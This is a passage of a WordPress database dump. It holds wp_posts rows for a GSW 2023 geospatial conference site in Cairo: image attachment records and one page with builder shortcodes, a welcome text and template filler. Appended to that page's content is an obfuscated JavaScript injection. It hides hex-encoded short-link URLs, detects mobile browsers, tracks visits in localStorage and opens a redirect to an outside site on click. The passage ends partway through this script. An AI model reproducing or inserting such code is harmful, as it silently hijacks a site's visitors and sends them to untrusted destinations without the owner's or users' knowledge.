(2250,1,'2018-06-25 14:10:27','2018-06-25 13:10:27','','s-soft-lg','','inherit','open','closed','','s-soft-lg','','','2018-06-25 14:10:27','2018-06-25 13:10:27','',0,'https://gsw2023.com/wp-content/uploads/2018/06/s-soft-lg.png',0,'attachment','image/png',0),
(2251,1,'2018-06-25 14:11:17','2018-06-25 13:11:17','','s-soft-lg-hd','','inherit','open','closed','','s-soft-lg-hd','','','2018-06-25 14:11:17','2018-06-25 13:11:17','',0,'https://gsw2023.com/wp-content/uploads/2018/06/s-soft-lg-hd.png',0,'attachment','image/png',0),
(2252,1,'2018-06-25 14:12:40','2018-06-25 13:12:40','','s-soft-lg-sm-hd','','inherit','open','closed','','s-soft-lg-sm-hd','','','2018-06-25 14:12:40','2018-06-25 13:12:40','',0,'https://gsw2023.com/wp-content/uploads/2018/06/s-soft-lg-sm-hd.png',0,'attachment','image/png',0),
(2253,1,'2018-06-25 14:12:40','2018-06-25 13:12:40','','s-soft-lg-sm','','inherit','open','closed','','s-soft-lg-sm','','','2018-06-25 14:12:40','2018-06-25 13:12:40','',0,'https://gsw2023.com/wp-content/uploads/2018/06/s-soft-lg-sm.png',0,'attachment','image/png',0),
(2254,1,'2018-06-25 14:16:28','2018-06-25 13:16:28','','the7-new-fav1','','inherit','open','closed','','the7-new-fav1-2','','','2018-06-25 14:16:28','2018-06-25 13:16:28','',0,'https://gsw2023.com/wp-content/uploads/2018/06/the7-new-fav1.gif',0,'attachment','image/gif',0),
(2255,1,'2018-06-25 14:17:03','2018-06-25 13:17:03','','the7-new-fav-hd1-2','','inherit','open','closed','','the7-new-fav-hd1-2','','','2018-06-25 14:17:03','2018-06-25 13:17:03','',0,'https://gsw2023.com/wp-content/uploads/2018/06/the7-new-fav-hd1-2.gif',0,'attachment','image/gif',0),
(2259,1,'2020-02-04 08:42:55','2020-02-04 08:42:55','','woocommerce-placeholder','','inherit','closed','closed','','woocommerce-placeholder-2','','','2020-02-04 08:42:55','2020-02-04 08:42:55','',0,'https://gsw2023.com/wp-content/uploads/2020/02/woocommerce-placeholder.png',0,'attachment','image/png',0),
(2260,1,'2022-10-04 00:31:12','2022-10-04 00:31:12','','trade091.jpg','','inherit','closed','closed','','trade091-jpg','','','2022-10-04 00:31:12','2022-10-04 00:31:12','',0,'https://gsw2023.com/wp-content/uploads/revslider/the7-software-company-slider/trade091.jpg',0,'attachment','image/jpeg',0),
(2261,1,'2022-10-04 00:31:12','2022-10-04 00:31:12','','trade191.jpg','','inherit','closed','closed','','trade191-jpg','','','2022-10-04 00:31:12','2022-10-04 00:31:12','',0,'https://gsw2023.com/wp-content/uploads/revslider/the7-software-company-slider/trade191.jpg',0,'attachment','image/jpeg',0),
(2262,1,'2022-10-04 00:31:12','2022-10-04 00:31:12','','trade061.jpg','','inherit','closed','closed','','trade061-jpg','','','2022-10-04 00:31:12','2022-10-04 00:31:12','',0,'https://gsw2023.com/wp-content/uploads/revslider/the7-software-company-slider/trade061.jpg',0,'attachment','image/jpeg',0),
(2263,1,'2022-10-04 00:31:12','2022-10-04 00:31:12','','trade221.jpg','','inherit','closed','closed','','trade221-jpg','','','2022-10-04 00:31:12','2022-10-04 00:31:12','',0,'https://gsw2023.com/wp-content/uploads/revslider/the7-software-company-slider/trade221.jpg',0,'attachment','image/jpeg',0),
(2264,1,'2022-10-04 00:31:12','2022-10-04 00:31:12','','art-sl1.png','','inherit','closed','closed','','art-sl1-png','','','2022-10-04 00:31:12','2022-10-04 00:31:12','',0,'https://gsw2023.com/wp-content/uploads/revslider/the7-software-company-slider/art-sl1.png',0,'attachment','image/png',0),
(2265,1,'2022-10-04 00:31:13','2022-10-04 00:31:13','','slider-trade-logo1.png','','inherit','closed','closed','','slider-trade-logo1-png','','','2022-10-04 00:31:13','2022-10-04 00:31:13','',0,'https://gsw2023.com/wp-content/uploads/revslider/the7-software-company-slider/slider-trade-logo1.png',0,'attachment','image/png',0),
(2266,1,'2022-10-04 00:46:50','2022-10-04 00:46:50','','gswmain','','inherit','open','closed','','gswmain','','','2022-10-04 00:46:50','2022-10-04 00:46:50','',0,'https://gsw2023.com/wp-content/uploads/2022/10/gswmain.jpg',0,'attachment','image/jpeg',0),
(2267,1,'2022-10-04 00:47:31','2022-10-04 00:47:31','','P1','','inherit','open','closed','','p1','','','2022-10-04 00:47:31','2022-10-04 00:47:31','',0,'https://gsw2023.com/wp-content/uploads/2022/10/P1.png',0,'attachment','image/png',0),
(2268,1,'2022-10-04 00:48:21','2022-10-04 00:48:21','','gswmain','','inherit','open','closed','','gswmain-2','','','2022-10-04 00:48:21','2022-10-04 00:48:21','',0,'https://gsw2023.com/wp-content/uploads/2022/10/gswmain-1.jpg',0,'attachment','image/jpeg',0),
(2269,1,'2022-10-04 01:30:04','2022-10-04 01:30:04','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\" margin_design_tab_text=\"\"]</p>\n<p style=\"text-align: left;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. It is the primary factor for human achievements throughout all ages. AASTMT has a host of qualified professors and experts who are capable of supporting Arab and African countries in various scientific fields. The GSW will provide a platform for international scholars, graduate students, future scientists and industrial sectors to learn exchange knowledge and experiences of applying geospatial technologies for sustainable development for better quality of life for people around the world. We would like to take this opportunity to welcome you to Cairo a vibrant, exhilarating, exotic, fascinating and welcoming city. Home to the best Pharaonic, Coptic and Islamic sights in Egypt. Cairo is where you never know what incredible, half-forgotten monument you might stumble across while wandering around. Enjoy the Nile view, visit the great pyramids of Giza, walk through the capital\'s medieval markets by Khan El-Khalili, or walk down the Nile promenade. We look forward to working with the ISPRS council, commissions presidents, working group officers, and other sister organizations to have a successful technical program and a memorable social program. It is great to have the GSW coming to Egypt where most probably the first mapping systems were developed 1000s years ago. Welcome to GSW\'2023 in Cairo, Egypt.</p>\n<p>[/ultimate_heading][/vc_column][vc_column offset=\"vc_col-lg-offset-1 vc_col-lg-10\"][vc_row_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon=\"icomoon-fontawesome-16x16-laptop\" icon_size=\"32\" icon_color=\"#ffffff\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Web Application Development\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"][/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon=\"icomoon-fontawesome-16x16-mobile-alt\" icon_size=\"32\" icon_color=\"#ffffff\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Mobile Application Development\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fmobile-applications-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"][/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon=\"icomoon-fontawesome-16x16-users\" icon_size=\"32\" icon_color=\"#ffffff\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Agile Team\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"][/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row equal_height=\"yes\" content_placement=\"middle\" bg_type=\"bg_color\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529517572787{padding-top: 70px !important;padding-bottom: 55px !important;}\" bg_color_value=\"rgba(170,170,170,0.1)\"][vc_column offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"How can we help you?\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"]Our job is nisi lectus, pharetra eget leo id, hendrerit ultricies magna. Duis bibendum quam in elit accumsan, quis maximus urna venenatis.[/ultimate_heading][/vc_column][vc_column offset=\"vc_col-lg-offset-1 vc_col-lg-10 vc_col-md-offset-0 vc_col-md-12\"][vc_row_inner content_placement=\"top\"][vc_column_inner width=\"1/3\"][bsf-info-box icon=\"icomoon-fontawesome-16x16-users\" icon_size=\"24\" icon_color=\"\" title=\"Agile team\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529526716112{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][bsf-info-box icon=\"icomoon-fontawesome-16x16-sitemap\" icon_size=\"24\" icon_color=\"\" title=\"Scrum\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529517895768{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][bsf-info-box icon=\"icomoon-fontawesome-16x16-window-restore\" icon_size=\"24\" icon_color=\"\" title=\"TDD\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529517964919{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon=\"icomoon-fontawesome-16x16-code\" icon_size=\"24\" icon_color=\"\" title=\"Clean code\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529518016290{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][bsf-info-box icon=\"icomoon-fontawesome-16x16-thumbs-up\" icon_size=\"24\" icon_color=\"\" title=\"Quality software\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529518063362{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][bsf-info-box icon=\"icomoon-fontawesome-16x16-rocket\" icon_size=\"24\" icon_color=\"\" title=\"Innovative\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529518383809{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon=\"icomoon-fontawesome-16x16-gem\" icon_size=\"24\" icon_color=\"\" title=\"Cost effective\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529518233084{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][bsf-info-box icon=\"icomoon-fontawesome-16x16-check-square\" icon_size=\"24\" icon_color=\"\" title=\"Transparent &amp; honest\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529518135334{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][bsf-info-box icon=\"icomoon-fontawesome-16x16-lightbulb\" icon_size=\"24\" icon_color=\"\" title=\"Creative\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529518683161{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1529519814966{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #8426B0), color-stop(54%, #BD0282), color-stop(95%, #EC4B3C));background: -moz-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -webkit-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -o-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -ms-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"``The time is always right to do what is right!``\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][/vc_column][/vc_row][vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529525768333{padding-top: 70px !important;padding-bottom: 75px !important;}\"][vc_column offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Our latest projects\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"]We provides a full spectrum s nisi lectus, pharetra eget leo id, hendrerit ultricies magna. Duis bibendum quam in elit accumsan venenatis.[/ultimate_heading][/vc_column][vc_column offset=\"vc_col-lg-offset-0 vc_col-lg-12 vc_col-md-offset-0 vc_col-md-12\"][dt_portfolio_carousel dis_posts_total=\"12\" content_alignment=\"center\" custom_content_bg_color=\"#f7f7f7\" post_content_paddings=\"20px 30px 30px 30px\" resized_image_dimensions=\"3x2\" image_border_radius=\"0px\" image_paddings=\"20px 20px 0px 20px\" slides_on_wide_desk=\"3\" slides_on_lapt=\"2\" slides_on_h_tabs=\"2\" slides_on_v_tabs=\"1\" post_title_font_size=\"22px\" post_title_line_height=\"32px\" post_date=\"n\" post_author=\"n\" post_comments=\"n\" post_content=\"off\" read_more_button=\"default_button\" read_more_button_text=\"Details\" project_icon_border_width=\"0px\" project_icon_color=\"#ffffff\" project_icon_color_hover=\"#ffffff\" next_icon=\"icon-ar-013-r\" prev_icon=\"icon-ar-013-l\" arrow_icon_size=\"32px\" arrow_bg_width=\"36x\" arrow_border_width=\"0px\" arrow_icon_color=\"rgba(0,0,0,0.15)\" arrows_bg_show=\"n\" arrow_icon_color_hover=\"\" arrows_bg_hover_show=\"n\" r_arrow_icon_paddings=\"0px 0px 0px 0px\" r_arrow_v_offset=\"0px\" l_arrow_icon_paddings=\"0px 0px 0px 0px\" l_arrow_v_offset=\"0px\" category=\"\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"Have a project you\'d like to talk about?\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Sed consequat erat vitae odio placerat, vel malesuada mi convallis we can help![/ultimate_heading][dt_default_button link=\"url:%2Fsoftware-company%2Fcontact%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][dt_default_button link=\"url:%2Fsoftware-company%2Fshowcase%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527107907{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]VIEW SHOWCASE[/dt_default_button][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const 